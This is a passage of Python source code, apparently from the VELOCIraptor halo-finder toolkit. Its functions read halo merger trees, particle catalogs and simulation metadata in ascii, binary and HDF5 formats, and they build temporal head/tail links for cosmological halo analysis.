split = np.add(np.asarray(treedata["ProgenOffsets"]),tree[snap]["Num_progen"],dtype=np.uint64,casting="unsafe")
#Read in the progenitors, splitting them as reading them in
tree[snap]["Progen"] = np.split(treedata["Progenitors"][:],split[:-1])
if(inpart): tree[snap]["Npart_progen"] = np.split(treedata["ProgenNpart"],split[:-1])
if(imerit): tree[snap]["Merit"] = np.split(treedata["Merits"],split[:-1])
snaptreelist.close()
if (iverbose): print("done reading tree file ",time.clock()-start)
return tree
def ReadHaloMergerTreeDescendant(treefilename,ireverseorder=True,ibinary=0,iverbose=0,imerit=False,inpart=False):
"""
VELOCIraptor/STF descendant based merger tree in ascii format contains
a header with
number_of_snapshots
a description of how the tree was built
total number of halos across all snapshots
then followed by data
for each snapshot
snapshotvalue numhalos
haloid_1 numprogen_1
progenid_1
progenid_2
...
progenid_numprogen_1
haloid_2 numprogen_2
.
.
.
one can also have an output format that has an additional field for each progenitor, the meritvalue
"""
start = time.clock()
tree=[]
if (iverbose): print("reading Tree file",treefilename,os.path.isfile(treefilename))
if (os.path.isfile(treefilename)==False):
print("Error, file not found")
return tree
#fine out how many snapshots there are
#if ascii format
if (ibinary==0):
if (iverbose): print("Reading ascii input")
treefile = open(treefilename, 'r')
numsnap=int(treefile.readline())
treefile.close()
#hdf format, input file is a list of filenames
elif(ibinary==2):
if (iverbose): print("Reading HDF5 input")
snaptreelist=open(treefilename,'r')
numsnap = sum(1 for line in snaptreelist)
snaptreelist.close()
else:
print("Unknown format, returning null")
numsnap=0
return tree
tree=[{"haloID": [], "Num_descen": [], "Descen": [], "Rank": []} for i in range(numsnap)]
if (imerit):
for i in range(numsnap):
tree[i]['Merit']=[]
if (inpart):
for i in range(numsnap):
tree[i]['Npart']=[]
tree[i]['Npart_descen']=[]
if (ibinary==0):
treefile = open(treefilename, 'r')
numsnap=int(treefile.readline())
descrip=treefile.readline().strip()
tothalos=int(treefile.readline())
offset=0
totalnumdescen=0
for i in range(numsnap):
ii=i
if (ireverseorder): ii=numsnap-1-i
[snapval,numhalos]=treefile.readline().strip().split('\t')
snapval=int(snapval);numhalos=int(numhalos)
#if really verbose
if (iverbose==2): print(snapval,numhalos)
tree[ii]["haloID"]=np.zeros(numhalos, dtype=np.int64)
tree[ii]["Num_descen"]=np.zeros(numhalos, dtype=np.uint32)
tree[ii]["Descen"]=[[] for j in range(numhalos)]
tree[ii]["Rank"]=[[] for j in range(numhalos)]
if (imerit): tree[ii]["Merit"]=[[] for j in range(numhalos)]
if (inpart):
tree[i]["Npart"]=np.zeros(numhalos, dtype=np.uint32)
tree[ii]["Npart_descen"]=[[] for j in range(numhalos)]
for j in range(numhalos):
data=treefile.readline().strip().split('\t')
hid=np.int64(data[0]);ndescen=np.uint32(data[1])
tree[ii]["haloID"][j]=hid
tree[ii]["Num_descen"][j]=ndescen
if (inpart):tree[ii]["Npart"][j]=np.uint32(data[2])
totalnumdescen+=ndescen
if (ndescen>0):
tree[ii]["Descen"][j]=np.zeros(ndescen,dtype=np.int64)
tree[ii]["Rank"][j]=np.zeros(ndescen,dtype=np.uint32)
if (imerit): tree[ii]["Merit"][j]=np.zeros(ndescen,dtype=np.float32)
if (inpart): tree[ii]["Npart_descen"][j]=np.zeros(ndescen,dtype=np.float32)
for k in range(ndescen):
data=treefile.readline().strip().split(' ')
tree[ii]["Descen"][j][k]=np.int64(data[0])
tree[ii]["Rank"][j][k]=np.uint32(data[1])
if (imerit): tree[ii]["Merit"][j][k]=np.float32(data[2])
if (inpart): tree[ii]["Npart_descen"][j][k]=np.uint32(data[3])
#hdf format
elif(ibinary==2):
snaptreelist=open(treefilename,'r')
#read the first file, get number of snaps from hdf file
snaptreename = snaptreelist.readline().strip()+".tree"
treedata=h5py.File(snaptreename,"r")
numsnaps=treedata.attrs['Number_of_snapshots']
treedata.close()
snaptreelist.close()
snaptreelist=open(treefilename,'r')
for snap in range(numsnap):
snaptreename = snaptreelist.readline().strip()+".tree"
if (iverbose): print("Reading",snaptreename)
treedata = h5py.File(snaptreename,"r")
tree[snap]["haloID"] = np.array(treedata["ID"])
tree[snap]["Num_descen"] = np.array(treedata["NumDesc"])
if(inpart):tree[snap]["Npart"] = np.asarray(treedata["Npart"])
#See if the dataset exits
if("DescOffsets" in treedata.keys()):
#Find the indices to split the array
split = np.add(np.array(treedata["DescOffsets"]), tree[snap]["Num_descen"],dtype=np.uint64,casting="unsafe")
# Read in the data splitting it up as reading it in
tree[snap]["Rank"] = np.split(treedata["Ranks"][:],split[:-1])
tree[snap]["Descen"] = np.split(treedata["Descendants"][:],split[:-1])
if(inpart): tree[snap]["Npart_progen"] = np.split(treedata["ProgenNpart"][:],split[:-1])
if(imerit): tree[snap]["Merit"] = np.split(treedata["Merits"][:],split[:-1])
snaptreelist.close()
if (iverbose): print("done reading tree file ",time.clock()-start)
return tree
def ReadHaloPropertiesAcrossSnapshots(numsnaps,snaplistfname,inputtype,iseperatefiles,iverbose=0,desiredfields=[]):
"""
read halo data from snapshots listed in file with snaplistfname file name
"""
halodata=[dict() for j in range(numsnaps)]
ngtot=[0 for j in range(numsnaps)]
atime=[0 for j in range(numsnaps)]
start=time.clock()
print("reading data")
#if there are a large number of snapshots to read, read in parallel
#only read in parallel if worthwhile, specifically if large number of snapshots and snapshots are ascii
iparallel=(numsnaps>20 and inputtype==2)
if (iparallel):
#determine maximum number of threads
nthreads=min(mp.cpu_count(),numsnaps)
nchunks=int(np.ceil(numsnaps/float(nthreads)))
print("Using", nthreads,"threads to parse ",numsnaps," snapshots in ",nchunks,"chunks")
#load file names
snapnamelist=open(snaplistfname,'r')
catfilename=["" for j in range(numsnaps)]
for j in range(numsnaps):
catfilename[j]=snapnamelist.readline().strip()
#allocate a manager
manager = mp.Manager()
#use manager to specify the dictionary and list that can be accessed by threads
hdata=manager.list([manager.dict() for j in range(numsnaps)])
ndata=manager.list([0 for j in range(numsnaps)])
adata=manager.list([0 for j in range(numsnaps)])
#now for each chunk run a set of proceses
for j in range(nchunks):
offset=j*nthreads
#if last chunk then must adjust nthreads
if (j==nchunks-1):
nthreads=numsnaps-offset
#when calling a process pass manager based proxies, which then are used to copy data back
processes=[mp.Process(target=ReadPropertyFileMultiWrapper,args=(catfilename[offset+k],k+offset,hdata,ndata,adata,inputtype,iseperatefiles,iverbose,desiredfields)) for k in range(nthreads)]
#start each process
#store the state of each thread, alive or not, and whether it has finished
activethreads=[[True,False] for k in range(nthreads)]
count=0
for p in processes:
print("reading", catfilename[offset+count])
p.start()
#space threads apart (join's time out is 0.25 seconds
p.join(0.2)
count+=1
totactivethreads=nthreads
while(totactivethreads>0):
count=0
for p in processes:
#join thread and see if still active
p.join(0.5)
if (p.is_alive()==False):
#if thread nolonger active check if its been processed
if (activethreads[count][1]==False):
#make deep copy of manager constructed objects that store data
#halodata[i][offset+count]=deepcopy(hdata[offset+count])
#try instead init a dictionary
halodata[offset+count]=dict(hdata[offset+count])
ngtot[offset+count]=ndata[offset+count]
atime[offset+count]=adata[offset+count]
#effectively free the data in manager dictionary
hdata[offset+count]=[]
activethreads[count][0]=False
activethreads[count][1]=True
totactivethreads-=1
count+=1
#terminate threads
for p in processes:
p.terminate()
else:
snapnamelist=open(snaplistfname,'r')
for j in range(0,numsnaps):
catfilename=snapnamelist.readline().strip()
print("reading ", catfilename)
halodata[j],ngtot[j],atime[j] = ReadPropertyFile(catfilename,inputtype,iseperatefiles,iverbose,desiredfields)
print("data read in ",time.clock()-start)
return halodata,ngtot,atime
def ReadCrossCatalogList(fname,meritlim=0.1,iverbose=0):
"""
Reads a cross catalog produced by halomergertree,
also allows trimming of cross catalog using a higher merit threshold than one used to produce catalog
"""
start = time.clock()
if (iverbose): print("reading cross catalog")
dfile=open(fname,"r")
dfile.readline()
dfile.readline()
dataline=(dfile.readline().strip()).split('\t')
ndata=np.int32(dataline[1])
pdata=CrossCatalogList(ndata)
for i in range(0,ndata):
data=(dfile.readline().strip()).split('\t')
nmatches=np.int32(data[1])
for j in range(0,nmatches):
data=(dfile.readline().strip()).split(' ')
meritval=np.float32(data[1])
nsharedval=np.float32(data[2])
if(meritval>meritlim):
nmatchid=np.int64(data[0])
pdata.matches[i].append(nmatchid)
pdata.matches[i].append(meritval)
pdata.nsharedfrac[i].append(nsharedval)
pdata.nmatches[i]+=1
dfile.close()
if (iverbose): print("done reading cross catalog ",time.clock()-start)
return pdata
def ReadSimInfo(basefilename):
"""
Reads in the information in .siminfo and returns it as a dictionary
"""
filename = basefilename + ".siminfo"
if (os.path.isfile(filename)==False):
print("file not found")
return []
cosmodata = {}
siminfofile = open(filename,"r")
line = siminfofile.readline().strip().split(" : ")
while(line[0]!=""):
cosmodata[line[0]] = float(line[1])
line = siminfofile.readline().strip().split(" : ")
siminfofile.close()
return cosmodata
def ReadUnitInfo(basefilename):
"""
Reads in the information in .units and returns it as a dictionary
"""
filename = basefilename + ".units"
if (os.path.isfile(filename)==False):
print("file not found")
return []
unitdata = {}
unitsfile = open(filename,"r")
line = unitsfile.readline().strip().split(" : ")
while(line[0]!=""):
unitdata[line[0]] = float(line[1])
line = unitsfile.readline().strip().split(" : ")
unitsfile.close()
return unitdata
def ReadParticleDataFile(basefilename,ibinary=0,iseparatesubfiles=0,iparttypes=0,iverbose=0, binarydtype=np.int64):
"""
VELOCIraptor/STF catalog_group, catalog_particles and catalog_parttypes in various formats
Note that a file will indicate how many files the total output has been split into
"""
inompi=True
if (iverbose): print("reading particle data",basefilename)
gfilename=basefilename+".catalog_groups"
pfilename=basefilename+".catalog_particles"
upfilename=pfilename+".unbound"
tfilename=basefilename+".catalog_parttypes"
utfilename=tfilename+".unbound"
#check for file existence
if (os.path.isfile(gfilename)==True):
numfiles=0
else:
gfilename+=".0"
pfilename+=".0"
upfilename+=".0"
tfilename+=".0"
utfilename+=".0"
inompi=False
if (os.path.isfile(gfilename)==False):
print("file not found")
return []
byteoffset=0
#load header information from file to get total number of groups
#ascii
if (ibinary==0):
gfile = open(gfilename, 'r')
[filenum,numfiles]=gfile.readline().split()
filenum=int(filenum);numfiles=int(numfiles)
[numhalos, numtothalos]= gfile.readline().split()
numhalos=np.uint64(numhalos);numtothalos=np.uint64(numtothalos)
#binary
elif (ibinary==1):
gfile = open(gfilename, 'rb')
[filenum,numfiles]=np.fromfile(gfile,dtype=np.int32,count=2)
[numhalos,numtothalos]=np.fromfile(gfile,dtype=np.uint64,count=2)
#hdf
elif (ibinary==2):
gfile = h5py.File(gfilename, 'r')
filenum=int(gfile["File_id"][0])
numfiles=int(gfile["Num_of_files"][0])
numhalos=np.uint64(gfile["Num_of_groups"][0])
numtothalos=np.uint64(gfile["Total_num_of_groups"][0])
gfile.close()
particledata=dict()
particledata['Npart']=np.zeros(numtothalos,dtype=np.uint64)
particledata['Npart_unbound']=np.zeros(numtothalos,dtype=np.uint64)
particledata['Particle_IDs']=[[] for i in range(numtothalos)]
if (iparttypes==1):
particledata['Particle_Types']=[[] for i in range(numtothalos)]
#now for all files
counter=np.uint64(0)
subfilenames=[""]
if (iseparatesubfiles==1): subfilenames=["",".sublevels"]
for ifile in range(numfiles):
for subname in subfilenames:
bfname=basefilename+subname
gfilename=bfname+".catalog_groups"
pfilename=bfname+".catalog_particles"
upfilename=pfilename+".unbound"
tfilename=bfname+".catalog_parttypes"
utfilename=tfilename+".unbound"
if (inompi==False):
gfilename+="."+str(ifile)
pfilename+="."+str(ifile)
upfilename+="."+str(ifile)
tfilename+="."+str(ifile)
utfilename+="."+str(ifile)
if (iverbose) : print("reading",bfname,ifile)
#ascii
if (ibinary==0):
gfile = open(gfilename, 'r')
#read header information
gfile.readline()
[numhalos,foo]= gfile.readline().split()
numhalos=np.uint64(numhalos)
gfile.close()
#load data
gdata=np.loadtxt(gfilename,skiprows=2,dtype=np.uint64)
numingroup=gdata[:numhalos]
offset=gdata[int(numhalos):int(2*numhalos)]
uoffset=gdata[int(2*numhalos):int(3*numhalos)]
#particle id data
pfile=open(pfilename, 'r')
pfile.readline()
[npart,foo]= pfile.readline().split()
npart=np.uint64(npart)
pfile.close()
piddata=np.loadtxt(pfilename,skiprows=2,dtype=np.int64)
upfile= open(upfilename, 'r')
upfile.readline()
[unpart,foo]= upfile.readline().split()
unpart=np.uint64(unpart)
upfile.close()
upiddata=np.loadtxt(upfilename,skiprows=2,dtype=np.int64)
if (iparttypes==1):
#particle id data
tfile= open(tfilename, 'r')
tfile.readline()
[npart,foo]= tfile.readline().split()
tfile.close()
tdata=np.loadtxt(tfilename,skiprows=2,dtype=np.uint16)
utfile= open(utfilename, 'r')
utfile.readline()
[unpart,foo]= utfile.readline().split()
utfile.close()
utdata=np.loadtxt(utfilename,skiprows=2,dtype=np.uint16)
#binary
elif (ibinary==1):
gfile = open(gfilename, 'rb')
np.fromfile(gfile,dtype=np.int32,count=2)
[numhalos,foo]=np.fromfile(gfile,dtype=np.uint64,count=2)
#need to generalise to
numingroup=np.fromfile(gfile,dtype=binarydtype ,count=numhalos)
offset=np.fromfile(gfile,dtype=binarydtype,count=numhalos)
uoffset=np.fromfile(gfile,dtype=binarydtype,count=numhalos)
gfile.close()
pfile = open(pfilename, 'rb')
np.fromfile(pfile,dtype=np.int32,count=2)
[npart,foo]=np.fromfile(pfile,dtype=np.uint64,count=2)
piddata=np.fromfile(pfile,dtype=binarydtype ,count=npart)
pfile.close()
upfile = open(upfilename, 'rb')
np.fromfile(upfile,dtype=np.int32,count=2)
[unpart,foo]=np.fromfile(upfile,dtype=np.uint64,count=2)
upiddata=np.fromfile(upfile,dtype=binarydtype ,count=unpart)
upfile.close()
if (iparttypes==1):
tfile = open(tfilename, 'rb')
np.fromfile(tfile,dtype=np.int32,count=2)
[npart,foo]=np.fromfile(tfile,dtype=np.uint16,count=2)
tdata=np.fromfile(tfile,dtype=binarydtype ,count=npart)
tfile.close()
utfile = open(utfilename, 'rb')
np.fromfile(utfile,dtype=np.int32,count=2)
[unpart,foo]=np.fromfile(utfile,dtype=np.uint16,count=2)
utdata=np.fromfile(utfile,dtype=binarydtype ,count=unpart)
utfile.close()
#hdf
elif (ibinary==2):
gfile = h5py.File(gfilename, 'r')
numhalos=np.uint64(gfile["Num_of_groups"][0])
numingroup=np.uint64(gfile["Group_Size"])
offset=np.uint64(gfile["Offset"])
uoffset=np.uint64(gfile["Offset_unbound"])
gfile.close()
pfile = h5py.File(pfilename, 'r')
upfile = h5py.File(upfilename, 'r')
piddata=np.int64(pfile["Particle_IDs"])
upiddata=np.int64(upfile["Particle_IDs"])
npart=len(piddata)
unpart=len(upiddata)
pfile.close()
upfile.close()
if (iparttypes==1):
tfile = h5py.File(tfilename, 'r')
utfile = h5py.File(utfilename, 'r')
tdata=np.uint16(pfile["Particle_Types"])
utdata=np.uint16(upfile["Particle_Types"])
tfile.close()
utfile.close()
#now with data loaded, process it to produce data structure
particledata['Npart'][counter:counter+numhalos]=numingroup
unumingroup=np.zeros(numhalos,dtype=np.uint64)
for i in range(int(numhalos-1)):
unumingroup[i]=(uoffset[i+1]-uoffset[i]);
unumingroup[-1]=(unpart-uoffset[-1])
particledata['Npart_unbound'][counter:counter+numhalos]=unumingroup
for i in range(numhalos):
particledata['Particle_IDs'][int(i+counter)]=np.zeros(numingroup[i],dtype=np.int64)
particledata['Particle_IDs'][int(i+counter)][:int(numingroup[i]-unumingroup[i])]=piddata[offset[i]:offset[i]+numingroup[i]-unumingroup[i]]
particledata['Particle_IDs'][int(i+counter)][int(numingroup[i]-unumingroup[i]):numingroup[i]]=upiddata[uoffset[i]:uoffset[i]+unumingroup[i]]
if (iparttypes==1):
particledata['Particle_Types'][int(i+counter)]=np.zeros(numingroup[i],dtype=np.int64)
particledata['Particle_Types'][int(i+counter)][:int(numingroup[i]-unumingroup[i])]=tdata[offset[i]:offset[i]+numingroup[i]-unumingroup[i]]
particledata['Particle_Types'][int(i+counter)][int(numingroup[i]-unumingroup[i]):numingroup[i]]=utdata[uoffset[i]:uoffset[i]+unumingroup[i]]
counter+=numhalos
return particledata
def ReadSOParticleDataFile(basefilename,ibinary=0,iverbose=0,binarydtype=np.int64):
"""
VELOCIraptor/STF catalog_group, catalog_particles and catalog_parttypes in various formats
Note that a file will indicate how many files the total output has been split into
"""
inompi=True
if (iverbose): print("reading particle data",basefilename)
filename=basefilename+".catalog_SOlist"
#check for file existence
if (os.path.isfile(filename)==True):
numfiles=0
else:
filename+=".0"
inompi=False
if (os.path.isfile(filename)==False):
print("file not found",filename)
return []
byteoffset=0
#load header information from file to get total number of groups
#ascii
if (ibinary==0):
gfile = open(filename, 'r')
[filenum,numfiles]=gfile.readline().split()
filenum=int(filenum);numfiles=int(numfiles)
[numSO, numtotSO]= gfile.readline().split()
[numparts, numtotparts]= gfile.readline().split()
numSO=np.uint64(numSO);numtothalos=np.uint64(numtotSO)
numparts=np.uint64(numparts);numtotparts=np.uint64(numtotparts)
#binary
elif (ibinary==1):
gfile = open(filename, 'rb')
[filenum,numfiles]=np.fromfile(gfile,dtype=np.int32,count=2)
[numSO,numtotSO]=np.fromfile(gfile,dtype=np.uint64,count=2)
[numparts,numtotparts]=np.fromfile(gfile,dtype=np.uint64,count=2)
#hdf
elif (ibinary==2):
gfile = h5py.File(filename, 'r')
filenum=int(gfile["File_id"][0])
numfiles=int(gfile["Num_of_files"][0])
numSO=np.uint64(gfile["Num_of_SO_regions"][0])
numtotSO=np.uint64(gfile["Total_num_of_SO_regions"][0])
numparts=np.uint64(gfile["Num_of_particles_in_SO_regions"][0])
numtotparts=np.uint64(gfile["Total_num_of_particles_in_SO_regions"][0])
gfile.close()
particledata=dict()
particledata['Npart']=[]
particledata['Particle_IDs']=[]
if (iverbose):
print("SO lists contains ",numtotSO," regions containing total of ",numtotparts," in ",numfiles," files")
if (numtotSO==0):
return particledata
particledata['Npart']=np.zeros(numtotSO,dtype=np.uint64)
particledata['Particle_IDs']=[[] for i in range(numtotSO)]
#now for all files
counter=np.uint64(0)
for ifile in range(numfiles):
filename=basefilename+".catalog_SOlist"
if (inompi==False):
filename+="."+str(ifile)
#ascii
if (ibinary==0):
gfile = open(filename, 'r')
#read header information
gfile.readline()
[numSO,foo]= gfile.readline().split()
[numparts,foo]= gfile.readline().split()
numSO=np.uint64(numSO)
numparts=np.uint64(numSO)
gfile.close()
#load data
gdata=np.loadtxt(gfilename,skiprows=2,dtype=np.uint64)
numingroup=gdata[:numSO]
offset=gdata[np.int64(numSO):np.int64(2*numSO)]
piddata=gdata[np.int64(2*numSO):np.int64(2*numSO+numparts)]
#binary
elif (ibinary==1):
gfile = open(filename, 'rb')
np.fromfile(gfile,dtype=np.int32,count=2)
[numSO,foo]=np.fromfile(gfile,dtype=np.uint64,count=2)
[numparts,foo]=np.fromfile(gfile,dtype=np.uint64,count=2)
numingroup=np.fromfile(gfile,dtype=binarydtype ,count=numSO)
offset=np.fromfile(gfile,dtype=binarydtype,count=numSO)
piddata=np.fromfile(gfile,dtype=binarydtype ,count=numparts)
gfile.close()
#hdf
elif (ibinary==2):
gfile = h5py.File(filename, 'r')
numSO=np.uint64(gfile["Num_of_SO_regions"][0])
numingroup=np.uint64(gfile["SO_size"])
offset=np.uint64(gfile["Offset"])
piddata=np.int64(gfile["Particle_IDs"])
gfile.close()
#now with data loaded, process it to produce data structure
particledata['Npart'][counter:counter+numSO]=numingroup
for i in range(numSO):
particledata['Particle_IDs'][int(i+counter)]=np.array(piddata[offset[i]:offset[i]+numingroup[i]])
counter+=numSO
return particledata
"""
Routines to build a hierarchy structure (both spatially and temporally)
"""
def BuildHierarchy(halodata,iverbose=0):
"""
the halo data stored in a velociraptor .properties file should store the id of its parent halo. Here
this catalog is used to produce a hierarchy to quickly access the relevant subhaloes of a parent halo.
#todo this should be deprecated as Hierarchy information is typically already contained in halo information
"""
halohierarchy=[]
start=time.clock()
if (iverbose): print("setting hierarchy")
numhalos=len(halodata["npart"])
subhaloindex=np.where(halodata["hostHaloID"]!=-1)
lensub=len(subhaloindex[0])
haloindex=np.where(halodata["hostHaloID"]==-1)
lenhal=len(haloindex[0])
halohierarchy=[[] for k in range(numhalos)]
if (iverbose): print("prelims done ",time.clock()-start)
for k in range(lenhal):
halohierarchy[haloindex[0][k]]=np.where(halodata["hostHaloID"]==halodata["ID"][haloindex[0][k]])
#NOTE: IMPORTANT this is only adding the subsub halos! I need to eventually parse the hierarchy
#data first to deteremine the depth of the subhalo hierarchy and store how deep an object is in the hierarchy
#then I can begin adding (sub)subhalos to parent subhalos from the bottom level up
"""
for k in range(0,len(halodata["npart"])):
hid=np.int32(halodata["hostHaloID"][k])
if (hid>-1 and halohierarchy[k]!=[]):
halohierarchy[hid]=np.append(np.int32(halohierarchy[hid]),halohierarchy[k])
"""
if (iverbose): print("hierarchy set in read in ",time.clock()-start)
return halohierarchy
def TraceMainProgen(istart,ihalo,numsnaps,numhalos,halodata,tree,TEMPORALHALOIDVAL):
"""
Follows a halo along tree to identify main progenitor
"""
#start at this snapshot
k=istart
#see if halo does not have a tail (descendant set).
if (halodata[k]['Tail'][ihalo]==0):
#if halo has not had a tail set the branch needs to be walked along the main branch
haloid=halodata[k]['ID'][ihalo]
#only set the head if it has not been set
#otherwise it should have already been set and just need to store the root head
if (halodata[k]['Head'][ihalo]==0):
halodata[k]['Head'][ihalo]=haloid
halodata[k]['HeadSnap'][ihalo]=k
halodata[k]['RootHead'][ihalo]=haloid
halodata[k]['RootHeadSnap'][ihalo]=k
roothead,rootsnap,rootindex=haloid,k,ihalo
else:
roothead=halodata[k]['RootHead'][ihalo]
rootsnap=halodata[k]['RootHeadSnap'][ihalo]
rootindex=int(roothead%TEMPORALHALOIDVAL)-1
#now move along tree first pass to store head and tails and root heads of main branch
while (True):
#instead of seraching array make use of the value of the id as it should be in id order
#wdata=np.where(tree[k]['haloID']==haloid)
#w2data=np.where(halodata[k]['ID']==haloid)[0][0]
wdata=w2data=int(haloid%TEMPORALHALOIDVAL)-1
halodata[k]['Num_progen'][wdata]=tree[k]['Num_progen'][wdata]
#if no more progenitors, break from search
#if (tree[k]['Num_progen'][wdata[0][0]]==0 or len(wdata[0])==0):
if (tree[k]['Num_progen'][wdata]==0):
#store for current halo its tail and root tail info (also store root tail for root head)
halodata[k]['Tail'][w2data]=haloid
halodata[k]['TailSnap'][w2data]=k
halodata[k]['RootTail'][w2data]=haloid
halodata[k]['RootTailSnap'][w2data]=k
#only set the roots tail if it has not been set before (ie: along the main branch of root halo)
#if it has been set then we are walking along a secondary branch of the root halo's tree
if (halodata[rootsnap]['RootTail'][rootindex]==0):
halodata[rootsnap]['RootTail'][rootindex]=haloid
halodata[rootsnap]['RootTailSnap'][rootindex]=k
break
#store main progenitor
#mainprog=tree[k]['Progen'][wdata[0][0]][0]
mainprog=tree[k]['Progen'][wdata][0]
#calculate stepsize based on the halo ids
stepsize=int(((haloid-haloid%TEMPORALHALOIDVAL)-(mainprog-mainprog%TEMPORALHALOIDVAL))/TEMPORALHALOIDVAL)
#store tail
halodata[k]['Tail'][w2data]=mainprog
halodata[k]['TailSnap'][w2data]=k+stepsize
k+=stepsize
#instead of searching array make use of the value of the id as it should be in id order
#for progid in tree[k-stepsize]['Progen'][wdata[0][0]]:
# wdata3=np.where(halodata[k]['ID']==progid)[0][0]
for progid in tree[k-stepsize]['Progen'][wdata]:
wdata3=int(progid%TEMPORALHALOIDVAL)-1
halodata[k]['Head'][wdata3]=haloid
halodata[k]['HeadSnap'][wdata3]=k-stepsize
halodata[k]['RootHead'][wdata3]=roothead
halodata[k]['RootHeadSnap'][wdata3]=rootsnap
#then store next progenitor
haloid=mainprog
def TraceMainProgenParallelChunk(istart,ihalochunk,numsnaps,numhalos,halodata,tree,TEMPORALHALOIDVAL):
"""
Wrapper to allow for parallelisation
"""
for ihalo in ihalochunk:
TraceMainProgen(istart,ihalo,numsnaps,numhalos,halodata,tree,TEMPORALHALOIDVAL)
def BuildTemporalHeadTail(numsnaps,tree,numhalos,halodata,TEMPORALHALOIDVAL=1000000000000, iverbose=1):
"""
Adds for each halo its Head and Tail and stores Roothead and RootTail to the halo
properties file
TEMPORALHALOIDVAL is used to parse the halo ids and determine the step size between descendant and progenitor
"""
print("Building Temporal catalog with head and tails")
for k in range(numsnaps):
halodata[k]['Head']=np.zeros(numhalos[k],dtype=np.int64)
halodata[k]['Tail']=np.zeros(numhalos[k],dtype=np.int64)
halodata[k]['HeadSnap']=np.zeros(numhalos[k],dtype=np.int32)
halodata[k]['TailSnap']=np.zeros(numhalos[k],dtype=np.int32)
halodata[k]['RootHead']=np.zeros(numhalos[k],dtype=np.int64)
halodata[k]['RootTail']=np.zeros(numhalos[k],dtype=np.int64)
halodata[k]['RootHeadSnap']=np.zeros(numhalos[k],dtype=np.int32)
halodata[k]['RootTailSnap']=np.zeros(numhalos[k],dtype=np.int32)
halodata[k]['Num_progen']=np.zeros(numhalos[k],dtype=np.uint32)
#for each snapshot identify halos that have not had their tail set
#for these halos, the main branch must be walked
#allocate python manager to wrapper the tree and halo catalog so they can be altered in parallel
manager=mp.Manager()
chunksize=5000000 #have each thread handle this many halos at once
#init to that at this point snapshots should be run in parallel
if (numhalos[0]>2*chunksize): iparallel=1
else: iparallel=-1 #no parallel at all
iparallel=-1
totstart=time.clock()
if (iparallel==1):
#need to copy halodata as this will be altered
if (iverbose>0): print("copying halo")
start=time.clock()
mphalodata=manager.list([manager.dict(halodata[k]) for k in range(numsnaps)])
if (iverbose>0): print("done",time.clock()-start)
for istart in range(numsnaps):
if (iverbose>0): print("Starting from halos at ",istart,"with",numhalos[istart])
if (numhalos[istart]==0): continue
#if the number of halos is large then run in parallel
if (numhalos[istart]>2*chunksize and iparallel==1):
#determine maximum number of threads
nthreads=int(min(mp.cpu_count(),ceil(numhalos[istart]/float(chunksize))))
nchunks=int(np.ceil(numhalos[istart]/float(chunksize)/float(nthreads)))
if (iverbose>0): print("Using", nthreads,"threads to parse ",numhalos[istart]," halos in ",nchunks,"chunks, each of size", chunksize)
#now for each chunk run a set of proceses
for j in range(nchunks):
start=time.clock()
offset=j*nthreads*chunksize
#if last chunk then must adjust nthreads
if (j==nchunks-1):
nthreads=int(ceil((numhalos[istart]-offset)/float(chunksize)))
halochunk=[range(offset+k*chunksize,offset+(k+1)*chunksize) for k in range(nthreads)]
#adjust last chunk
if (j==nchunks-1):
halochunk[-1]=range(offset+(nthreads-1)*chunksize,numhalos[istart])
#when calling a process pass not just a work queue but the pointers to where data should be stored
processes=[mp.Process(target=TraceMainProgenParallelChunk,args=(istart,halochunk[k],numsnaps,numhalos,mphalodata,tree,TEMPORALHALOIDVAL)) for k in range(nthreads)]
count=0
for p in processes:
print(count+offset,k,min(halochunk[count]),max(halochunk[count]))
p.start()
count+=1
for p in processes:
#join thread and see if still active
p.join()
if (iverbose>1): print((offset+j*nthreads*chunksize)/float(numhalos[istart])," done in",time.clock()-start)
#otherwise just single
else :
#if first time entering non parallel section copy data back from parallel manager based structure to original data structure
#as parallel structures have been updated
if (iparallel==1):
#tree=[dict(mptree[k]) for k in range(numsnaps)]
halodata=[dict(mphalodata[k]) for k in range(numsnaps)]
#set the iparallel flag to 0 so that all subsequent snapshots (which should have fewer objects) not run in parallel
#this is principly to minimize the amount of copying between manager based parallel structures and the halo/tree catalogs
iparallel=0
start=time.clock()
chunksize=max(int(0.10*numhalos[istart]),10)
for j in range(numhalos[istart]):
#start at this snapshot
#start=time.clock()
TraceMainProgen(istart,j,numsnaps,numhalos,halodata,tree,TEMPORALHALOIDVAL)
if (j%chunksize==0 and j>0):
if (iverbose>1): print("done", j/float(numhalos[istart]), "in", time.clock()-start)
start=time.clock()
if (iverbose>0): print("done with first bit")
#now have walked all the main branches and set the root head, head and tail values
#and can set the root tail of all halos. Start at end of the tree and move in reverse setting the root tail
#of a halo's head so long as that halo's tail is the current halo (main branch)
for istart in range(numsnaps-1,-1,-1):
for j in range(numhalos[istart]):
#if a halo's root tail is itself then start moving up its along to its head (if its head is not itself as well
k=istart
#rootheadid,rootheadsnap=halodata[k]['RootHead'][j],halodata[k]['RootHeadSnap'][j]
roottailid,roottailsnap=halodata[k]['RootTail'][j],halodata[k]['RootTailSnap'][j]
headid,headsnap=halodata[k]['Head'][j],halodata[k]['HeadSnap'][j]
if (roottailid==halodata[k]['ID'][j] and headid!=halodata[k]['ID'][j]):
#headindex=np.where(halodata[headsnap]['ID']==headid)[0][0]
headindex=int(headid%TEMPORALHALOIDVAL)-1
headtailid,headtailsnap=halodata[headsnap]['Tail'][headindex],halodata[headsnap]['TailSnap'][headindex]
haloid=halodata[k]['ID'][j]
#only proceed in setting root tails of a head who's tail is the same as halo (main branch) till we reach a halo who is its own head
while (headtailid==haloid and headid!=haloid):
#set root tails
halodata[headsnap]['RootTail'][headindex]=roottailid
halodata[headsnap]['RootTailSnap'][headindex]=roottailsnap
#move to next head
haloid=halodata[headsnap]['ID'][headindex]
#haloindex=np.where(halodata[headsnap]['ID']==haloid)[0][0]
haloindex=int(haloid%TEMPORALHALOIDVAL)-1
halosnap=headsnap
headid,headsnap=halodata[halosnap]['Head'][haloindex],halodata[halosnap]['HeadSnap'][haloindex]
headindex=int(headid%TEMPORALHALOIDVAL)-1
#store the tail of the next head
headtailid,headtailsnap=halodata[headsnap]['Tail'][headindex],halodata[headsnap]['TailSnap'][headindex]
print("Done building", time.clock()-totstart)
def TraceMainDescendant(istart,ihalo,numsnaps,numhalos,halodata,tree,TEMPORALHALOIDVAL,ireverseorder=False):
"""
Follows a halo along descendant tree to root tails
if reverse order than late times start at 0 and as one moves up in index
one moves backwards in time
"""
#start at this snapshot
halosnap=istart
#see if halo does not have a Head set
if (halodata[halosnap]['Head'][ihalo]==0):
#if halo has not had a Head set the branch needs to be walked along the main branch
haloid=halodata[halosnap]['ID'][ihalo]
